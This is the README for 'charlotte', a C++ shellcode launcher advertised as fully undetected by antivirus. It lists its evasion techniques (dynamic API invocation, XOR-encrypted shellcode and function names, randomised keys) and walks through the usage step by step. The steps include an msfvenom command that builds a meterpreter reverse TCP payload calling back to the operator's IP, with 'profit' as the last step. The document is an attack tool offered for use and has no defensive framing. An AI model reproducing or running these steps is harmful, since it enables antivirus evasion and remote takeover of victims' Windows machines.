charlotte: c++ fully undetected shellcode launcher
charlotte
c++ fully undetected shellcode launcher
description
- c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021.
- dynamic invoking of win32 api functions
- XOR encryption of shellcode and function names
- randomised XOR keys and variables per run
- on Kali Linux, simply ‘apt-get install mingw-w64*’ and that’s it!
antiscan.me
usage
git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py
example:
- git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
- cd charlotte
- msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
- python charlotte.py
- profit
tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike raw format payload
Source: https://github.com/9emin1/
